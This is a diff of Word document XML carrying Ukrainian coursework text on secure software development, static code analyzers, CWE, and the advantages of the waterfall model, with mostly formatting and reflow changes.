+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся, що дані</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> аутентифікації</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> видаляються зі сховища клієнта, наприклад, DOM</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> в браузері</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, після того, як сеанс завершується.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18686,9 +19566,41 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">7: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>Вимоги до криптографії та шифування</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19060,7 +19972,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">помилок у вихідних кодах. Всі продукти, спрямовані на аналіз вихідного коду, можна умовно розділити на три типи: </w:t>
+        <w:t xml:space="preserve">помилок у вихідних кодах. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Всі продукти, спрямовані на аналіз вихідного коду, можна умовно розділити на три типи: </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19272,18 +20195,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
+        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -19358,7 +20270,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
+        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -19424,7 +20347,19 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
+        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина ан</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>алізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -19466,18 +20401,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по автоматичному виправленню помилок. Варто зазначити, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
+        <w:t xml:space="preserve">.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по автоматичному виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -19520,6 +20444,7 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5940425" cy="2083489"/>
@@ -19732,8 +20657,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація </w:t>
-      </w:r>
+        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19742,41 +20668,40 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Дані документи безпосередньо не описують помилки програмування, на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
+        <w:t>відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -24096,7 +25021,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1553A869-C504-4D0B-ABD7-9F79D4F68ADF}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4395E903-DD3A-45BC-ABA8-21B58D6983CC}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -621,6 +621,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -1299,26 +1300,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>V-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>подібна</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> модель життєвого циклу розробки ПЗ</w:t>
+        <w:t>Переваги каскадної моделі</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1337,20 +1319,170 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>V-</w:t>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Неважко помітити, що каскадна мод</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ель має </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>безл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>іч переваг, якщо її</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">використовувати в проекті, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">для </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>якого вона досить прийнятна. нижче перераховані</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ці переваги:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">модель добре відома споживачам. які не мають відношення до розробки та експлуатації програм, і кінцевим користувачам (вона часто використовується іншими організаціями </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>для</w:t>
+      </w:r>
